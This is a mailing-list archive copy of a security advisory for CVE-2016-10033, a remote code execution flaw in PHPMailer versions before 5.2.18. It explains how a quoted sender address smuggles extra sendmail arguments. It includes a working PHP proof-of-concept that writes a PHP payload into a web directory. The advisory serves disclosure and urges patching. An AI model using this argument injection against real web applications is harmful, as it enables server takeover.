[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] PHPMailer < 5.2.18 Remote Code Execution [updated advisory] [CVE-2016-10033]
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] PHPMailer < 5.2.18 Remote Code Execution [updated advisory] [CVE-2016-10033]
- From: Dawid Golunski <dawid@xxxxxxxxxxxxxxxx>
- Date: Tue, 27 Dec 2016 10:05:25 -0200
PHPMailer < 5.2.18 Remote Code Execution
CVE-2016-10033
Attaching an updated version of the advisory with more details + simple PoC.
Still incomplete. There will be more updates/exploits soon at:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
and the feed:
https://twitter.com/dawid_golunski
--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10033
- Release date: 25.12.2016
- Last revision: 27.12.2016
- Revision 2.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
PHPMailer < 5.2.18 Remote Code Execution
II. BACKGROUND
-------------------------
"PHPMailer continues to be the world's most popular transport class, with an
estimated 9 million users worldwide. Downloads continue at a significant
pace daily."
http://phpmailer.worxware.com/
"Probably the world's most popular code for sending email from PHP!
Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii,
Joomla! and many more"
https://github.com/PHPMailer/PHPMailer
III. INTRODUCTION
-------------------------
An independent research uncovered a critical vulnerability in PHPMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the PHPMailer class.
Note: This revision (2.0) of the advisory, contains more information but
is still incomplete.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.
IV. DESCRIPTION
-------------------------
PHPMailer class uses PHP mail() function as its default transport.
The transport is implemented using the function:
protected function mailSend($header, $body)
{
$toArr = array();
foreach ($this->to as $toaddr) {
$toArr[] = $this->addrFormat($toaddr);
}
$to = implode(', ', $toArr);
$params = null;
//This sets the SMTP envelope sender which gets turned into a
return-path header by the receiver
if (!empty($this->Sender)) {
$params = sprintf('-f%s', $this->Sender);
}
if ($this->Sender != '' and !ini_get('safe_mode')) {
$old_from = ini_get('sendmail_from');
ini_set('sendmail_from', $this->Sender);
}
$result = false;
if ($this->SingleTo and count($toArr) > 1) {
foreach ($toArr as $toAddr) {
$result = $this->mailPassthru($toAddr, $this->Subject, $body,
$header, $params);
which essentially passes the arguments shown in the line:
$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
to the mail() function with the same set of parameters.
The parameters include the 5th parameter of $params which allows to pass extra
parameters to sendmail binary installed on the system as per PHP documentation
of mail() function:
http://php.net/manual/en/function.mail.php
As can we see from:
$params = sprintf('-f%s', $this->Sender);
PHPMailer uses the Sender variable to build the params string.
The Sender string is normally set with the use of setFrom() method.
which validates the Sender's address:
public function setFrom($address, $name = '', $auto = true)
{
$address = trim($address);
$name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
// Don't validate now addresses with IDN. Will be done in send().
if (($pos = strrpos($address, '@')) === false or
(!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported())
and
!$this->validateAddress($address)) {
...
The validation would for example reject an address as:
attacker -InjectedParam2 @attacker.com
which would prevent injection of additional parameters to Sendmail via the
mail() function.
Further research however shown that the validation is done using the RFC 3696
specification.
The RFC allows emails to contain spaces when quoted with ".
According to the spec, the following email address is valid:
" some test email address with spaces"@weird-email.com
The following Sender address:
"Attacker -Param2 -Param3"@test.com
would cause PHPMailer/mail() function to execute /usr/bin/sendmail with the
following list of arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@xxxxxxxx]
which would not work for the attacker (Param2 and Param3 are passed within
the same argument of argv[3] )
Attackers can however break out of parameter no.3 with some extra escaping.
For example, by injecting an extra sequence of \" after the first argument,
the following Sender email:
"Attacker \" -Param2 -Param3"@test.com
when passed to PHPMailer (and eventually to mail()) function would cause
sendmail to execute with:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
Which as can be seen would inject additional parameters of 4 & 5 to sendmail.
Attackers can exploit this to achieve code execution as shown in the PoC
below.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php
some"@email.com';
$msg_body = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@xxxxxxxxxxxxx";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
~~~~~~~~~~~
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million
servers)
as a PoC for real-world exploitation. It might be published after the vendor
has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
All versions of PHPMailer before the critical release of 5.2.18 are affected.
Note that exploitation is not limited to systems with Sendmail MTA.
VIII. SOLUTION
-------------------------
The vulnerability was responsibly disclosed to PHPMailer vendor.
The vendor released a critical security release of PHPMailer 5.2.18 to fix the
issue as notified at:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
CVE MITRE assigned the following ID to this vulnerability:
CVE-2016-10033
Users should urgently update to the patched release.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10033/PHPMailer-RCE-exploit-poc.txt
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
CVE-2016-10033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
PHPMailer / Vendor security updates / notices:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
27.12.2016 - Rev 2.0: Disclosure of additional information + Simple PoC
25.12.2016 - Limited advisory released to prompt an urgent update by
affected users before disclosing the details.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/